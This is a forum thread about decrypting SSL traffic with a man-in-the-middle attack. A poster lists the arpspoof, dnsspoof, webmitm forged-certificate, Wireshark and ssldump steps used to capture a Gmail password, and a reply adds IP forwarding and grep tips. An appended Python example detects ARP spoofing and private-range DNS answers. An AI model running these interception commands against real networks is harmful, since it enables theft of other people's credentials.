Monday, April 21, 2014
How to decrypt SSL traffic using a MITM attack


Guest
Posted on 05-03-09 01:08
http://www.hackerscenter.com/index.php?/Video/General/How-to-decrypt-SSL-encrypted-traffic-using-a-man-in-the-middle-attack-Auditor.html

I've followed this step by step and have not had any luck capturing my own password.. what might I be doing wrong?

commands ran--

fragrouter -B1
arpspoof -t XX.XX.XX.XX XX.Router.IP.ADD
webmitm (made a cert)
dnsspoof

wireshark (and start recording everything)

On the victim machine, when I perform an nslookup on gmail, the IP address is from my local area network.

Secondly, on the victim machine, when I visit gmail.com over https, there is a warning about the fake certificate I issued using the attacker's rig.

Log in to my own account.

Switch back to the attackers rig.

Save the captured packets.

Then I ran: ssldump -r capture -k webmitm.crt -d > out

Lastly: cat out | grep 'Passwd'

I get nothing, and I looked through the out file and it seems like I am recording the traffic that is for gmail.com, but I can't see my own password. Any ideas?

Thank you guys for any words of wisdom.



RE: How to decrypt SSL traffic using a MITM attack


Guest
Posted on 06-03-09 05:46
more than one way to skin a cat

no need for fragrouter:
Code
echo "1" > /proc/sys/net/ipv4/ip_forward

and remember

Code
Lastly: cat out | grep 'Passwd'

Linux is case sensitive and read the manual

Code
man grep
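
Two things the first post observes on the client, the LAN address returned by nslookup for gmail and the redirection set up with arpspoof, are what a defender can check for from that same machine. The following is an added example in Python, not code from the thread; the `arp -an` lines, MAC addresses and DNS answers are constructed sample data, and the function names are hypothetical.

```python
import ipaddress
import re
from collections import defaultdict

# RFC 1918 ranges; a public hostname answering from one of these is suspect.
RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Matches the "(ip) at mac" part of an `arp -an` line; incomplete entries do not match.
ARP_RE = re.compile(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9a-fA-F:]{17})")

def shared_macs(arp_lines):
    """Return {mac: sorted IPs} for every MAC claimed by more than one IP."""
    by_mac = defaultdict(set)
    for line in arp_lines:
        m = ARP_RE.search(line)
        if m:
            by_mac[m.group(2).lower()].add(m.group(1))
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def private_answers(dns_answers):
    """Return (name, ip) pairs where a public name resolved into RFC 1918 space."""
    hits = []
    for name, ip in dns_answers:
        addr = ipaddress.ip_address(ip)
        if any(addr in net for net in RFC1918):
            hits.append((name, ip))
    return hits

# Constructed sample data: ARP cache and lookup results as seen on the client.
SAMPLE_ARP = [
    "? (192.168.1.1) at 00:0c:29:aa:bb:cc [ether] on eth0",   # gateway
    "? (192.168.1.50) at 00:0c:29:aa:bb:cc [ether] on eth0",  # same MAC as gateway
    "? (192.168.1.20) at 00:1b:21:11:22:33 [ether] on eth0",
]
SAMPLE_DNS = [("gmail.com", "192.168.1.50"), ("example.org", "203.0.113.10")]

if __name__ == "__main__":
    for mac, ips in shared_macs(SAMPLE_ARP).items():
        print(f"ARP: {mac} answers for {', '.join(ips)}")
    for name, ip in private_answers(SAMPLE_DNS):
        print(f"DNS: {name} resolved to private address {ip}")
```

A MAC shared by the gateway and another host, together with a public name resolving to a LAN address, matches what the client in the first post would show; either finding alone can also have benign causes such as proxy ARP or split-horizon DNS.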